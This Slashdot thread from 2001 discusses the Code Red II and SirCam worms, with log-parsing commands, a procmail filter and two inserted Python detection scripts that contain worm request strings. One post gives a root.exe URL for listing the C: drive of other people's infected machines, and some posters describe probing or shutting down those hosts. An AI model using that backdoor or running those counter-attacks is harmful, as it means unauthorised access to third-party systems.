    2. Re:Why do people still use Outlook? by alfredo · · Score: 1

      Don't you think businesses should held responsible if they sell a shoddy product?

      MS seems to push product out the door when they are "good enough", not when they are ready. We end up being the cannon fodder.

      Let's see you try to return some software to them saying it is defective.

      There is no consumer protection when it comes to software. All other industry has some standard they must achieve. What makes software exempt from consumer protection laws?

      --
      My Photostream
    3. Re:Why do people still use Outlook? by BigBlockMopar · · Score: 2

      Yelling, "There should be a law!" just makes you look like a dumb liberal that needs the government to protect him from himself.

      For sure, and such a law would stifle innovation far more than Microsoft has. Imagine the liability in releasing a beta (or... gasp! an alpha) version?

      Now, I think there have to be other ways to go after Microsloth, more than legislation. What's needed is a judge - perhaps one as braindead as the one who awarded millions to the dumb woman who spilled coffee on her lap - who can be used to our advantage in a class-action lawsuit from all victims of the default-dangerous Microsoft machines in the field.

      --
      Fire and Meat. Yummy.
  124. Re:The Breaking Point by rberger · · Score: 2, Interesting
    Why not a class action suit against Microsoft? Seems that would be an appropriate action since Microsoft is now officially a monopoly. End users who are receiving the SirCam files who are not Microsoft users are one good class. ISPs who do not use Microsoft servers whose networks are being flooded by Code Red and SirCam are another good class...

    And even the clueless ones who continue to use inherently defective software such as Outlook and IIS have as much right to sue MS as people who smoked for 50 years have to sue tobacco firms...

  125. Re:The Breaking Point by NetJunkie · · Score: 2

    Suing software makers for bugs is a "bad idea". How many open source authors are going to want to be held liable for that when they don't even get paid for their work? Not many.

  126. Re:huge cable modem hits by dj28 · · Score: 1

    No kidding. My cable modem data light blinks non-stop now. Fortunately, the router is blocking anything to port 80. But from the way data is pouring in, i would figure it to be several scans per minute to my cable modem.

  127. Sadmind/IIS unicode worm already did that by BCoates · · Score: 1

    the Sadmind/IIS unicode worm already did the copy-cmd.exe-to-the-scripts-directory thing. CodeRed uses the same vulnerability, just attaches a different payload than changing your index.html to "f--- usa!", etc.

    Kiddies were already scanning around for /scripts/root.exe and using it to set up those lovely little DoS scripts...

    --
    Benjamin Coates

    1. Re:Sadmind/IIS unicode worm already did that by sigurdur · · Score: 1
      Code Red and Sadmind/IIS do not use the same vulnerability.

      Code Red in all incarnations uses a vulnerability in the Indexing Server Stuff (TM) while Sadmind/IIS used a directory traversal vulnerability. See CA-2001-19 and CA-2001-13, both at CERT/CC, for more info on the vulnerabilities.

  128. this sucks by aechols · · Score: 1, Redundant

    some grepping and word counting revealed about 606 hits as of about 5:00 CDT last night. my first attack was at Aug 3 at 23:40 CDT. i don't think the activity light on my cable modem has stopped blinking yet. each computer attempts to infect three times before it gives up & moves on.

    what i don't look forward to is probably an increase in this kind of crap as XP rolls out with raw socket support. (if you read GRC stuff then this is old news) script kiddies everywhere, and more attacks can be made that were previously impossible or at the least difficult to accomplish. yes it's true that this started in w2k, but does everybody actually have w2k? nope. they're really gonna push XP though, unlike any of the upgrades past 95.

    then again maybe everyone does have it, seeing how many attacks i'm getting. the most aggravating thing about this is that all of the attacks just bounce off me (proudly microsoft free :) but my connection sucks now because of all the morons that didn't patch themselves up after the first time it went around.

    --
    Are you pondering what I'm pondering?
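The "quick perl script" from post 106, the "| uniq" from post 117, the grep-and-count from post 128 and sigurdur's point in 127 that Code Red's .ida overflow and the Sadmind/IIS Unicode traversal are different holes, pulled together as one added example that is not any poster's code: a Python classifier over a constructed Apache access_log. The addresses, timestamps and request strings are assumed sample data, and the %c0%af / %c1%9c traversal signatures and the N-versus-X filler used to tell the Code Red generations apart are the widely published ones, not anything from this thread.

```python
import re
from collections import Counter
from ipaddress import ip_address

# Constructed Apache combined-format access_log (sample data, not real hits);
# documentation/private ranges stand in for the real source addresses.
SAMPLE_LOG = r"""
10.0.0.5 - - [03/Aug/2001:23:40:12 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 276 "-" "-"
10.0.0.5 - - [03/Aug/2001:23:40:13 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 276 "-" "-"
10.0.0.5 - - [03/Aug/2001:23:40:15 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 276 "-" "-"
192.0.2.17 - - [05/Aug/2001:01:02:03 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 276 "-" "-"
198.51.100.8 - - [05/Aug/2001:02:10:44 -0500] "GET /scripts/root.exe?/c+dir+c:\ HTTP/1.0" 404 220 "-" "-"
198.51.100.8 - - [05/Aug/2001:02:11:01 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 220 "-" "-"
203.0.113.4 - - [05/Aug/2001:02:30:00 -0500] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
"""

# One combined-log line: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>\S+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return the fields of one access_log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    """Name the worm activity a request path indicates; None for ordinary traffic."""
    p = path.lower()
    if p.startswith("/default.ida"):
        # The .ida ISAPI overflow used by every Code Red generation (CA-2001-19).
        return "code-red-probe"
    if "%c0%af" in p or "%c1%9c" in p:
        # Overlong UTF-8 forms of '/' and '\': the IIS directory traversal used by
        # the Sadmind/IIS worm (CA-2001-13). Tested before the cmd.exe check
        # because traversal requests also name cmd.exe.
        return "unicode-traversal"
    if "root.exe" in p or "cmd.exe" in p:
        # Someone using the cmd.exe copy that CRII leaves in /scripts.
        return "backdoor-use"
    return None


def variant_hint(path):
    """Tell Code Red generations apart by the filler character padding the overflow."""
    query = path.split("?", 1)[1] if "?" in path else ""
    if query.startswith("X"):
        return "CRII"
    if query.startswith("N"):
        return "CRv1/v2"
    return "unknown"


def summarize(log_text):
    """Per offending source IP: first-seen time, Counter of activity kinds, variants seen."""
    sources = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec["path"])
        if kind is None:
            continue  # normal visitor, not reported
        entry = sources.setdefault(
            rec["ip"], {"first_seen": rec["time"], "hits": Counter(), "variants": set()}
        )
        entry["hits"][kind] += 1
        if kind == "code-red-probe":
            entry["variants"].add(variant_hint(rec["path"]))
    return sources


def unique_sources(log_text, kind=None):
    """De-duplicated, numerically sorted offender list (the '| uniq' step), optionally one kind."""
    summary = summarize(log_text)
    ips = [ip for ip, e in summary.items() if kind is None or e["hits"][kind]]
    return sorted(ips, key=ip_address)


def report(log_text):
    """One tab-separated line per source, ready to paste into an abuse report."""
    lines = []
    summary = summarize(log_text)
    for ip in sorted(summary, key=ip_address):
        e = summary[ip]
        kinds = ", ".join(f"{k}={n}" for k, n in sorted(e["hits"].items()))
        variants = "/".join(sorted(e["variants"])) or "-"
        lines.append(f"{ip}\tfirst={e['first_seen']}\t{kinds}\tvariants={variants}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_LOG)))
```

Note that the three hits from 10.0.0.5 within seconds match the three-attempts-per-host behaviour several posters describe, which is why the report counts per source rather than per line.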
    1. Re:this sucks by wapentake · · Score: 1

      XP's raw socket support won't make things any worse. If code red wanted raw socket support, it could have included winpcap & a packet driver in the payload, and achieved raw socket capabilities. The worries about XP's raw socket support are rubbish. I daily criticize micros~1 for waiting so long to add raw socket support. It has so many uses.

    2. Re:this sucks by raju1kabir · · Score: 1
      my point about raw socket support & code red is that a similar worm could appear, one that requires the use of malformed packets to take control of the IIS server/other microsoft product

      This is getting better and better. How are you going to take control of IIS with malformed packets?

      --
      "Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
  129. Re:The Breaking Point by tbo · · Score: 1

    Didn't say it was a good idea. I just said it could happen. I'm sure MS would love it, because it would destroy Linux.

  130. SirCam procmail recipe by tstock · · Score: 2, Informative

    # Procmail recipe: silently discard SirCam carriers.
    # ":0 B" tests the conditions below against the message body.
    :0 B
    # Condition 1: the body is larger than 100000 bytes (the worm carries a file).
    * > 100000
    # Condition 2: the body contains this base64 fragment of the worm's payload.
    * mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6HDo8OkQ6SD
    /dev/null

    1. Re:SirCam procmail recipe by tstock · · Score: 1

      actually, there is no space between HD and o8 on the recipe above. I blame this typo on /.

  131. Bad Idea by Sludge · · Score: 1, Redundant

    By design, it's a very bad idea to make your trojan/virus do anything too shocking.

    Ever boiled a frog? If you throw a frog in hot water, it'll jump out. If you slowly turn up the heat, it'll roast.

    This sort of violent behaviour in a virus stops it from being able to live with its host, because it gets detected way too fast. A worm/virus/trojan that has too great a consequence on its host will be wiped out too soon, and in the case of the worm, this means lesser propagation.

    <\Devil's advocate>

  132. zero day nirvana by LinuxHam · · Score: 1

    Think about what CRII is going to do for the zero day lists!! Hey.. how about a gnutella hack that automatically accepts uploads and shares 'em right back out??

    --
    Intelligent Life on Earth
    1. Re:zero day nirvana by Dr.+Spork · · Score: 1

      Interesting! How about recruiting zombies to act as gnutella hubs? The problem with your plan is that after the attack is detected, it will be very easy to see who actually uploaded to you (unless there's some way of masking that...).

    2. Re:zero day nirvana by LinuxHam · · Score: 1

      how about this gnutella hack having built-in support for tcp bounces.. servers will find IPs of other servers in their logs.. the bounce servers won't log bounce traffic.. it'll be just like how NAT works today..

      hey I got it.. the gnutella peers find themselves based on detected probes!! they don't even have to look for each other.. they automatically announce!

      now if we could just select a port and community string..

      --
      Intelligent Life on Earth
  133. Re:Someone needs to write by norton_I · · Score: 2, Interesting

    That is probably illegal, and certainly a bad idea (self reproducing code almost always causes problems even when you don't intend it to) but what I wonder is if you could get away with creating a CGI called default.ida that attempted to automatically connect back to the client, disinfect the machine, and install a patch. It is much less dangerous since it doesn't reproduce, and you could certainly make the argument that it was only done in retaliation to someone (unwittingly) attempting to infect your computer with a virus.

  134. Imagine? Nah... by tsmit · · Score: 1


    I have to live with it being on the biggest "script kiddie" network on earth (ATT Broadband). I'm getting approximately 3000 HTTP port probes against my machine an hour (without a webserver). If i reboot my windows machine, it takes me 30 minutes to get a DHCP address due to the fact that the DHCP server is hosed.

    DoS attack against the Whitehouse? I don't think so, how about a DoS attack against everyone? I can't even get to servers in Italy.

    --
    Yes, my girlfriend is a BitchX
  135. huge cable modem hits by rknop · · Score: 3, Redundant

    I've got a cable modem on nash1.tn.home.com, and my iptables log is seeing a huge number of hits (we're talking an average of several a minute, more or less) to port 80. Since I'm not actually running a web server, I don't have the logs that tell me if this is in fact Code Red, but I suspect that's what a huge amount of this activity is.

    It's depressing, really.

    -Rob

    1. Re:huge cable modem hits by dozing · · Score: 1

      Now consider that the bandwidth for cable modems is shared among all the users on the same loop and multiply that 0.8Kbps you speak of times all the people on that loop. It still might not be huge but it is significant.

      --
      Dozings.com -- Its kinda funny... If you're as crazy as me.
    2. Re:huge cable modem hits by IronChef · · Score: 2


      You aren't even supposed to send email to your job from an @home account. (no joke, tech support is adamant about that.) They have an @work package if you need to do business stuff.

      In typical @home fashion, the upgrade to @work isn't available to all @home subscribers, because it is a DSL service, not cable modem... the coverage doesn't overlap 100%.

      I'll keep violating the @home TOS quite happily, so long as they are dense enough to let me.

    3. Re:huge cable modem hits by friedmud · · Score: 1

      TCPDump is working just fine - seems like a huge number of "arp who-has" commands are streaming in.

      I don't think whatever is looking for these addresses is being very successful - I haven't been able to contact any of the ips it is looking for - seems to be very inefficient.

      Thanks for the heads up about ethereal but I don't have a monitor/keyboard/mouse connected to my router at all - just a lonely box in the corner :)

      -Fried

    4. Re:huge cable modem hits by modecx · · Score: 1

      If it has enough disk space, install the X libraries, and Ethereal, and operate all your fun X stuff over ssh tunnel. As easy as that.

      --
      Constitutional rights may be respected, repealed, or modified; but they must never be ignored.
    5. Re:huge cable modem hits by Croaker · · Score: 2
      No kidding. My cable modem data light blinks non-stop now.

      Mine too. I'm on AT&T Broadband/Road Runner/Whatever the hell they are calling themselves now.

      I have a website up, so Apache is logging all hits on the site... it seems the access_log is only logging one attempt to access the site per infected host... the error_log indicates that the worm is actually hitting the site three times in quick succession (I think over a period of minutes). The only thing is, neither log really accounts for all the traffic that appears at the modem. Everything else is being blocked by the router/firewall appliance, which doesn't have great logging capabilities.

      It looks like Red Alert recently hit a motherlode of AT&T broadband sites, since I am seeing mostly sites hitting me that trace back to AT&T. Like another poster mentioned, you're not supposed to be running servers (so... sshh! I'm not running anything ;). I'm willing to bet a good number of people have an install of Windows 2000 or NT up with IIS installed and running by default. I bet most don't even know they are running a web server, much less that it's been infected. The few sites I tried to access that appear in my log all have the default "this page not available" thing, which is what I think IIS coughs up if you've not made some directory the server root.

      I suspect one thing is that the DSL and cable companies may be prompted to crack down on servers hosted on their network. I mean, if they really wanted to enforce the ban, they can just do a sweep of their network and tell you to knock it off or they will pull the plug. I wonder if they will actually start doing this.

    6. Re:huge cable modem hits by iturbide · · Score: 1

      Pah. Just run it on vnc, that'll work fine. Just do a search on vnc at freshmeat.net and you'll find what you need to run X apps on your server.
      There are other X-servers (actually technically a bit of a different thing) out there, too. Some of them cost money.

    7. Re:huge cable modem hits by Saint+Aardvark · · Score: 1

      I'm on ADSL, Telus in Vancouver. It's the Code Red Monty Python skit: "Arp, arp, arp, arp, arp, arp, arp, arp...."

    8. Re:huge cable modem hits by interiot · · Score: 2
      I mean, if they really wanted to enforce the ban, they can just do a sweep of their network and tell you to knock it off or they will pull the plug.

      They don't even have to go to that great of an effort. All they need to do is have their routers check a single bit in the TCP header to see if it's an incoming SYN packet, and ignore all of those.

      I assume they haven't done this because it would piss off ICQ users and such. And I think they really mean "no bandwidth hogging servers".

      But they could easily block incoming SYN packets on specific ports (in fact, they have the ability to do this, they're doing it for a very limited number of ports (netbios)). I assume their unwritten policy is to be nice, but they want to have a legal safety net there for when they want to start swinging their axes. Kind of strange, I think.

    9. Re:huge cable modem hits by ogre2112 · · Score: 1

      I'm running a webserver, and I just checked my logs...

      OUCH! 200 hits from code red today alone. The earliest hit I saw was on July 19th.

    10. Re:huge cable modem hits by jsse · · Score: 2

      So I install Apache to collect the logs for the historic moment. :)

    11. Re:huge cable modem hits by PupSteR · · Score: 1

      heh yeah it's funny, i checked my webserver logs, 40 in a minute.. funny.. good for historical information, and to turn into @home :)

    12. Re:huge cable modem hits by PupSteR · · Score: 1

      Yep, I'll keep doing the same, at least until I go to college next month... then i'll violate the TOS for college by running a dormroom server. need i say more?

    13. Re:huge cable modem hits by jrockway · · Score: 1
      It's from the Code Red randomly guessing IPs. Every time the arp-cache sees an IP it doesn't know, it has to ask. So when Code Red starts spitting random IPs out, an arp who-has comes out. See example:
      Worm:
      1.1.1.1:80 --> GET /default.ida?[snip]
      1.1.1.2:80 --> GET /default.ida?[snip]
      1.1.1.3:80 --> GET /default.ida?[snip]
      1.1.1.4:80 --> GET /default.ida?[snip]

      Router
      1.1.1.255 --> arp who-has 1.1.1.1
      1.1.1.255 --> arp who-has 1.1.1.2
      1.1.1.255 --> arp who-has 1.1.1.3
      1.1.1.255 --> arp who-has 1.1.1.4

      Or something like that...
      --
      My other car is first.
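jrockway's ARP explanation, and friedmud's observation that none of the addresses being asked for can be reached, turned into a detection check as an added example that is not from any poster: it parses constructed tcpdump -n lines (both the old "arp who-has" wording quoted above and the newer "ARP, Request who-has" wording are assumed formats) and flags a requester that asks for many addresses nobody ever answers, which on a shared cable segment is the footprint of random-IP scanning rather than of real neighbours talking.

```python
import re
from collections import defaultdict

# Constructed tcpdump -n output (assumed sample, not a real capture). The
# gateway 10.1.1.1 asks for a run of addresses that never reply, while 10.1.1.5
# makes one ordinary request that is answered.
SAMPLE_TCPDUMP = """\
23:40:01.100 arp who-has 10.1.1.20 tell 10.1.1.1
23:40:01.102 arp who-has 10.1.1.21 tell 10.1.1.1
23:40:01.104 arp who-has 10.1.1.22 tell 10.1.1.1
23:40:01.105 arp who-has 10.1.1.5 tell 10.1.1.1
23:40:01.106 arp reply 10.1.1.5 is-at 00:11:22:33:44:55
23:40:01.110 arp who-has 10.1.1.23 tell 10.1.1.1
23:40:01.111 arp who-has 10.1.1.24 tell 10.1.1.1
23:40:01.120 arp who-has 10.1.1.1 tell 10.1.1.5
23:40:01.121 arp reply 10.1.1.1 is-at 00:aa:bb:cc:dd:ee
23:40:02.000 ARP, Request who-has 10.1.1.25 tell 10.1.1.1, length 28
23:40:02.050 ARP, Request who-has 10.1.1.26 tell 10.1.1.1, length 28
"""

TS_RE = re.compile(r"^(\d{2}):(\d{2}):(\d{2}(?:\.\d+)?)")
# "arp who-has T tell A" (older tcpdump) and "ARP, Request who-has T tell A, length N" (newer).
WHO_HAS_RE = re.compile(r"who-has (?P<target>[\d.]+) tell (?P<asker>[\d.]+)")
REPLY_RE = re.compile(r"(?:arp reply|ARP, Reply) (?P<target>[\d.]+) is-at")


def _seconds(line):
    """Timestamp of a tcpdump line as seconds since midnight (None if absent)."""
    m = TS_RE.match(line)
    if not m:
        return None
    h, mi, s = m.groups()
    return int(h) * 3600 + int(mi) * 60 + float(s)


def arp_scan_report(capture, min_targets=5, max_answered_ratio=0.2):
    """Flag requesters that ask for many distinct addresses which nobody answers.

    A host (or, as jrockway describes, the gateway acting for off-segment
    scanners) that keeps asking for addresses that never reply is resolving
    guessed IPs, not talking to real neighbours.
    """
    asked = defaultdict(set)      # requester -> distinct targets asked for
    requests = defaultdict(int)   # requester -> number of who-has seen
    first, last = {}, {}          # requester -> first/last timestamp
    answered = set()              # targets that produced an ARP reply
    for line in capture.splitlines():
        m = WHO_HAS_RE.search(line)
        if m:
            asker = m["asker"]
            asked[asker].add(m["target"])
            requests[asker] += 1
            t = _seconds(line)
            if t is not None:
                first.setdefault(asker, t)
                last[asker] = t
            continue
        m = REPLY_RE.search(line)
        if m:
            answered.add(m["target"])
    flagged = []
    for asker, targets in asked.items():
        unanswered = targets - answered
        answered_ratio = (len(targets) - len(unanswered)) / len(targets)
        if len(targets) >= min_targets and answered_ratio <= max_answered_ratio:
            flagged.append({
                "requester": asker,
                "targets": len(targets),
                "unanswered": len(unanswered),
                "requests": requests[asker],
                "span_s": last.get(asker, 0.0) - first.get(asker, 0.0),
            })
    return sorted(flagged, key=lambda r: -r["unanswered"])


if __name__ == "__main__":
    for r in arp_scan_report(SAMPLE_TCPDUMP):
        print(f"{r['requester']}: {r['requests']} requests for {r['targets']} addresses "
              f"in {r['span_s']:.2f}s, {r['unanswered']} never answered")
```

Feed it `tcpdump -n -l arp` output captured on the router box friedmud describes; the thresholds are assumptions to tune per segment.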
  136. Nasty as it gets? by Spackler · · Score: 1

    Or just plain simple?
    Just type the following into a browser using one of the infected systems from your log file:

    http://infected_system/scripts/root.exe?/c+dir+c:\

    You are greeted with a directory listing of the root of C:\!
    I just LOVE windows!
    This is going to get MUCH worse!

    1. Re:Nasty as it gets? by Tomcow2000 · · Score: 1

      Actually, you can sue them. That doesn't mean you'll win, but knowing MS, they'll settle rather than endure a long court case (especially with current lawsuits against them)

      --

      Sleep: A completely inadequate substitute for caffeine.
  137. Mountain Dew: Code Red by Spaztek · · Score: 2, Informative

    Speaking of Code Red, mountain dew code red is a highly malicious blend of virus, cough syrup, and caffeine. All are bad except caffeine. Just like this virus, all are bad on windows machines, except those which aren't windows machines. I guess linux is like the caffeine of all soda. The good parts :-)

    --
    "If a man watches 3 football games in a row he should be declared legally dead" - A
  138. Compromised Machines are abundant by spinfire · · Score: 1
    Almost all of these machines are infected with the CR II variant, and most of them reside in the same class A/B subnet. I tried the root attempt myself on one of them, results are here.

  139. Re:Anyone still consider this a Microsoft problem? by LinuxHam · · Score: 1

    now are either workstations with IIS installed and the user doesn't know/remember

    A friend of mine is a cable modem user who got infected. He said on or about the 1st, his cable modem light suddenly became maxed out. He's usually good with his system administration, but he recently switched back from RH to Win2k server. He checked and checked and found out that some Windows Media Server had been installed and was running its own copy of IIS, which had been infected.

    The next day he installed Apache Win32.

    --
    Intelligent Life on Earth
  140. The Breaking Point by tbo · · Score: 5, Insightful

    I think Code Red (and Sircam, which your average Joe will probably lump together with Code Red in his mind) will be the virus that breaks the camel's back. It's gotten constant publicity, it's coming back for a second round, and this time, it wants blood.

    What will happen? I don't know, but here are some possibilities:

    Revolt against Microsoft software. We'd all love for this to happen, but their PR machine is probably too good. Still, we can always hope people realize that MS bears a large part of the responsibility here.

    Lawsuit. Assuming the virus writers aren't found, the next logical targets will be Microsoft, and owners of a large number of infected hosts. Why it probably won't happen: suing Microsoft over this draws attention to the fact that your company's computer systems are insecure, and that your admins were too lazy/stupid to install the patch. Microsoft can always hide behind their patch, which was available well in advance, and claim that "everyone knows that bugs happen, and it's up to admins to keep up to date" (never mind that this contradicts their own marketing material--when has inconsistency ever stopped marketing before?). Suing somebody with a large bunch of infected hosts is also silly, since, to be infected by them, you have to be just as inept as them.

    Government Intervention. Some state governors may push silly state bills, but they'll be irrelevant. What would really get interesting is if the Feds pass some sort of laws, either making people responsible for keeping their systems secure, or defining what kind of liability software manufacturers are exposed to in these circumstances (i.e., can you sue MS? For how much?). Why it probably won't happen: With Congress and Bush on vacation, not much will get done in at least the next month, and things will probably have come to a head before then. Only if this round does serious damage (perhaps the world's biggest DDoS against some high-profile targets, like Akamai), and another generation of Code Red pops up in September (just in time to catch all those college PCs with their pirated copies of Windows 2000 Server and high bandwidth), will this become a real possibility.

    Internet Collapses. I really doubt it, I just had to say it to satisfy Cringely :-) Seriously, though, things may get slow, but I have a feeling vigilante efforts (counter-worms, Apache scripts that reboot infected attacking Win boxes, etc.) will keep this from happening.

    So, which will it be, folks? This would make a great SlashPoll.

    1. Re:The Breaking Point by Tack · · Score: 1
      Or, the more probable outcome:

      Nothing. That's right. Life goes on as usual. The net and its users survive yet another disturbance in the force, and we return to our regularly scheduled program.

      Jason.

    2. Re:The Breaking Point by Anonymous Coward · · Score: 1

      That's a good point. Should be modded up, if moderators were not smoking crap right now.

    3. Re:The Breaking Point by jolan · · Score: 1

      djbdns is an open source replacement. you get a cash award for finding vulnerabilities in it. the only reason i can see for suing a software company is if there is a glaring security problem and they act slow to fix it, or deny that it is a problem. microsoft used to do both of these, but have since gotten much better. it really is funny though when microsoft servers get defaced/hacked. it seems that they too can lack the competence to patch (their own) servers.

    4. Re:The Breaking Point by Saint+Nobody · · Score: 3, Funny

      yeah, i laughed when i got a port 80 hit from cust2120.EzSecureHosting.com. it's apparently not as secure as they would have people think, so customer 2120 could probably sue them.

      and microsoft has the same "we make no guarantees" clauses that free software licenses have, so either the case would be dismissed, or clauses like that would be ruled illegal, which could be bad for free software, unless they only made it illegal to attach those clauses to commercial software

      --
      #define F(x) int main(){printf(#x,10,#x);}
      F(#define F(x) int main(){printf(#x,10,#x);}%cF(%s))
    5. Re:The Breaking Point by jesser · · Score: 1

      Why it probably won't happen: suing Microsoft over this draws attention to the fact that your company's computer systems are insecure, and that your admins were too lazy/stupid to install the patch.

      Three words: class action lawsuit.

      --
      The shareholder is always right.
    6. Re:The Breaking Point by MajroMax · · Score: 1
      Revolt against Microsoft software. We'd all love for this to happen, but their PR machine is probably too good. Still, we can always hope people realize that MS bears a large part of the responsibility here.

      As much as I like the idea of Microsoft paying through the nose, I would really rather it not happen because of Code Red. Why? Because Microsoft really isn't to blame here.

      The security flaw was exposed to the public (not kept secret), and a patch was released & made available a full month before the main CR outbreak. They did everything they reasonably should have.

      Internet Collapses. I really doubt it, I just had to say it to satisfy Cringley :-) Seriously, though, things may get slow, but I have a feeling vigilante efforts (counter-worms, Apache scripts that reboot infected attacking Win boxes, etc.) will keep this from happening.

      Actually, I wouldn't particularly mind it if every AOL/MSN/Etc. subscriber decided that the Internet was too dangerous and unplugged their computer. More bandwidth for me. :)

      --
      "Evil company X is threatening to restrict our rights! Let's all get together to stop--OOOH! SHINEY!!!" -- AC
    7. Re:The Breaking Point by nyet · · Score: 2

      None of the above.

      I vote for

      Crucify the next virus writer (or other random, innocent hacker) they manage to catch and pass more inane laws that have no other effect but to make your life as a programmer even more difficult. Microsoft will be hailed as the "hero" in the case, them being the underdogs against a sea of malicious open source hackers, when they release a patch that closes the script kiddie hole of the week, but not much else. 3rd party vendors will scramble to create more useless server side "personal firewall" applications that filter ONLY traffic based on *OLD* infection methods. No attempt will be made to make IIS itself less of a security risk. No reporting of IIS cgi-child processes running with admin level permissions will be made. Releasing the results of virus related research will become illegal. Discussing possible future vulnerabilities will become illegal. Using any "hacker" operating system (e.g. not made by Microsoft) will become illegal. Using the word "virus" or "worm" anywhere on the Internet will earn you a visit from the FBI (after all, if you are innocent, you have nothing to hide). That small inconvenience of having all of your "computer related" possessions confiscated (including your home and car) and yourself thrown in jail w/o bail is insignificant when compared to the amount of viruses prevented from spreading.

    8. Re:The Breaking Point by nyet · · Score: 3, Insightful

      The security flaw was exposed to the public (not kept secret), and a patch was released & made available a full month before the main CR outbreak. They did everything they reasonably should have.

      Except that IIS still runs with admin privileges. Nice try though.

    9. Re:The Breaking Point by Kris_J · · Score: 3, Insightful

      You forget ICE -- the rather romantic "Intrusion Countermeasure Electronics" -- an automated response to terminate unauthorised hack attempts. I'm currently running the IIS shutdown line as specified by other /. posters for every IP address that probes me (I'm on a dynamic 56k dialup, I should not be getting HTTP requests -- I never did before CodeRed). It would probably be trivial to automate the process, and POOF! your first ICE program.

    10. Re:The Breaking Point by p_trinli · · Score: 1

      Gates drops to his knees and begs Linus's forgiveness, pledging to devote Microsoft's thousands of programs to stable, secure, efficient open source software. Bill Gates may decide to Do the Right Thing. Why it probably won't happen. Gates is still mad with power, and sore over a wedgie received in high school.

    11. Re:The Breaking Point by automandc · · Score: 1
      You left out the most likely (SlashPoll) option:

      CowboyNeal Saves the Day!

      --
      I'm a lawyer with excellent karma. Something's gotta be wrong.
    12. Re:The Breaking Point by Shotgun+Willy · · Score: 1

      The SlashPoll result is obvious: CowboyNeal!!

    13. Re:The Breaking Point by Tony-A · · Score: 1

      There is a critical difference with open source, paid or unpaid. With open source, the recipient of the code is in a position to diagnose and debug the code. Without open source, the recipient of the code must rely on the authors. If the legal system is at all reasonable, that should make a lot of difference.

  141. oh c'mon... by Anonymous Coward · · Score: 1, Redundant

    please. posting another story like this is almost as big a waste of bandwidth as the worm.

    please reference previous stories: http://slashdot.org/article.pl?sid=01/08/05/0433219.

  142. Anyone still consider this a Microsoft problem? by NetJunkie · · Score: 2

    I can understand admins not patching when the fix first hit. The usual "Won't happen to me problem". But now? After all this press? All the news stories?

    I think the systems we're seeing infected now are either workstations with IIS installed and the user doesn't know/remember, or server with no real support staff sitting in a closet somewhere. Now the question is, will they EVER get patched?

    Someone whip up a worm that patches systems. Be like a cyberwar from the movies. How cool is that? :)

  143. ...and these machines are proud of it! by Sun+Tzu · · Score: 4, Interesting

    heheh! Not only is it a fine remote administration feature, but it's also pretty slick the way machines upgraded in this way advertise their new status to everyone with a webserver on port 80.

  144. Securityfocus asks for IPs by mawis · · Score: 5, Informative

    To notify the administrators of the attacking servers you can send their IP followed by the date and time of the attack to aris-report@securityfocus.com. - Please use this format because it's a robot address. http://securityfocus.com/announcements/310

    1. Re:Securityfocus asks for IPs by Cave+Dweller · · Score: 1

      Here's a quick (and ugly, ugly, ugly) kludge:

      cat access_log | grep default.ida | tr -d '[' | tr -d ']' | awk '{print $1 " " $4 " " $5}'

    2. Re:Securityfocus asks for IPs by ssimpson · · Score: 1

      This is probably a stupid point from a Linux newbie, but don't you have to add a "| sort | uniq"? My limited understanding is that uniq only removes duplicate consecutive entries?

      --
      "Mary had a crypto key, she kept it in escrow, and everything that Mary said, the Feds were sure to know."
    3. Re:Securityfocus asks for IPs by blakestah · · Score: 2

      This one works for me for default apache logging options. 50 IP addresses so far. All your IIS servers are belong to me.

      grep \?XXX /var/log/apache/access.log | mawk '{ print($1 " "$4 " " $5) }' | Mail -s "Compromised machines" aris-report@securityfocus.com

    4. Re:Securityfocus asks for IPs by Paranoid · · Score: 1

      That's the correct way to use uniq, yes. However, since the dates and times are all different, uniq won't do much. All that addition would end up doing is sorting by IP address, rather than by time.

      --
      Paranoid
      Bwaahahahahaa.
    5. Re:Securityfocus asks for IPs by LightningTH · · Score: 1

      In reply to this, I have written a script for myself but of course giving it out for others to use also. It will go thru apache's access log and auto-alert security focus to new IPs. Ya just have to set up a crontab job to fire it off once in awhile.

      Just do a wget on http://www.lightspeed.cx/code-red-ii-mail, open it up and modify it slightly for the paths. Going to the link may make the file unreadable in some browsers.

  145. lucky by orbitalia · · Score: 1

    ..that code red I wasn't written along the lines of code red II. There would be a lot more unpatched websites out there with super user wide open.. I think this hints that code red I and code red II are written by different people.

  146. Experiment by XBL · · Score: 2, Interesting
    I am on @Home, and have an unpatched Windows 2000 Server (Warez Edition) installation. I've just turned it on a half-hour ago. Now let's see how long it takes to get the worm. If I get it, I'll post an update with the time.

    Right now my NIC is flickering like mad, yet Windows 2000 does not show these as incoming or outgoing packets. What is going on?

    1. Re:Experiment by XBL · · Score: 1

      Well, nothing yet, after 1 hour...

    2. Re:Experiment by XBL · · Score: 1
      Well, almost 2 hours, and not one attempt. The only thing on the log file is me.

      Interesting...

    3. Re:Experiment by XBL · · Score: 1

      No it's not. My Linux box was doing it before I even turned on the W2k server box. So there :-P

    4. Re:Experiment by Fenris+Ulf · · Score: 1

      Probably ARP requests. Here on my end of @Home, every hour or two I get arp requests for every IP in our netblock, which I presume is the NOC's way of keeping track of who is using which IPs. This has been happening since I got the service a year ago, so I doubt it's an attacker. If you hook a Unix box up to the feed, you can tcpdump it and see the ARP packets. I imagine there must be some equivalent for Win boxen too.

